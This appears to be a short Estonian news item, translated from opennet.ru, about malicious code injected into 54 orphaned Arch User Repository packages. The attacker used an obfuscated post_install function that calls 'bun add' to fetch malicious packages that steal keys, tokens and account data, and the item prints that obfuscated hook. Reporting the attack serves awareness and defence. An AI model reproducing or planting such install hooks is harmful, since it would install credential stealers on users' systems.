AUR-is on toimunud pahatahtliku koodi sisestamine veel 54 paketti

Hoolimata Arch Linuxi arendajate vĂ”tudest ei ole AUR-i (Arch User Repository) pahatahtliku koodi sisestamine lĂ”petatud. MĂ”ni tund tagasi sisestati pahatahtlik kood veel 54 paketti, mis on jÀÀnud ilma hooldusteta (pahatahtlike muudatuste tĂŒhistamise ajalugu). Erinevalt eelmise pĂ€eva rĂŒnnakutest ei kasutatud sel korral pahatahtlike sĂ”ltuvuste installimiseks pakettide haldurit npm, vaid platvormi bun. Rakendatud filtrite vĂ€ltimiseks sisestatakse post_install funktsiooni obfuskeeritud string, milles kutsub vĂ€lja kĂ€sku «bun add» pahatahtlike koodiga pakettide installimiseks, mis skaneerivad ja saadavad andmeid vĂ€lisele server vĂ”tmete, tokenite ja kontoinfo.

post_install() {
$’\x63'»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d’‘d’ $’\141\x6e'»s'»i»»-«$’\143'»o»l»o»r’$’\x73' ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}

Allikas: opennet.ru

Osta usaldusvÀÀrne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid đŸ”„ Osta usaldusvÀÀrne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid | ProHoster